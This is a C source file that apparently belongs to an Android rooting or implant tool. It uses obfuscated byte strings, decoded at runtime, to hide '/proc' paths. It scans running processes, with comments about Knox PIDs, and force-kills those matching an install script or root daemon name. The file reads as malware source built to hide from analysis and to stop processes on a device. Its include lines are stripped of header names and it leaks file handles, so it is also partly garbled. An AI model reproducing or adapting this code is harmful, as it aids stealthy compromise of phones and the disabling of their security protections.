#include #include #include #include #include #include #include #include #include "deobfuscate.h" #include "utils.h" #include "shell_params.h" #include "log.h" static unsigned char proc[] = "\x86\x7d\xfe\x5b\x0e\x0c\x1b\x1f"; // "/proc" static unsigned char proc_cmd[] = "\x5b\x9d\xd6\x8c\x55\x5b\x4c\x48\x8c\x86\x58\x8c\x48\x4e\x41\x49\x52\x4f\x46"; // "/proc/%s/cmdline" int find_process(char *str_ps) { DIR *dp; struct dirent *ep; char str[256]; char out[256]; FILE *f; struct stat st1; int pid; int ret = 0; dp = opendir(deobfuscate(proc)); if (dp != NULL) { while (ep = readdir (dp)) { snprintf(str, sizeof(str), deobfuscate(proc_cmd), ep->d_name); if(stat(str, &st1) < 0) continue; // Check the process name f = fopen(str, "r"); if(f != NULL) { // Look for knox PIDs fread(out, 1, sizeof(out), f); if(strcasestr(out, str_ps) != NULL) ret = 1; } } closedir(dp); } return ret; } int kill_debuggerd(void) { DIR *dp; struct dirent *ep; char str[256]; char out[256]; FILE *f; struct stat st1; int pid; int ret = 0; dp = opendir(deobfuscate(proc)); if (dp != NULL) { while (ep = readdir (dp)) { snprintf(str, sizeof(str), deobfuscate(proc_cmd), ep->d_name); if(stat(str, &st1) < 0) continue; // Check the process name f = fopen(str, "r"); if(f != NULL) { // Look for knox PIDs fread(out, 1, sizeof(out), f); if(strcasestr(out, deobfuscate(INSTALL_SCRIPT)) != NULL) { pid = strtoul(ep->d_name, NULL, 10); // Stop it kill(pid, SIGKILL); ret = 1; break; } } } closedir(dp); } return ret; } int kill_root_daemon(void) { DIR *dp; struct dirent *ep; char str[256]; char out[256]; FILE *f; struct stat st1; int pid; int ret = 0; LOGD("KILL STARTED"); sleep(2); dp = opendir(deobfuscate(proc)); if (dp != NULL) { while (ep = readdir (dp)) { snprintf(str, sizeof(str), deobfuscate(proc_cmd), ep->d_name); if(stat(str, &st1) < 0) continue; // Check the process name f = fopen(str, "r"); if(f != NULL) { // Look for knox PIDs fread(out, 1, sizeof(out), f); if(strcasestr(out, deobfuscate(ROOT_BIN_ARG0)) != NULL) { pid = strtoul(ep->d_name, NULL, 10); // Stop it LOGD("Going to kill pid %d", pid); kill(pid, SIGKILL); ret = 1; continue; } } } closedir(dp); } return ret; } .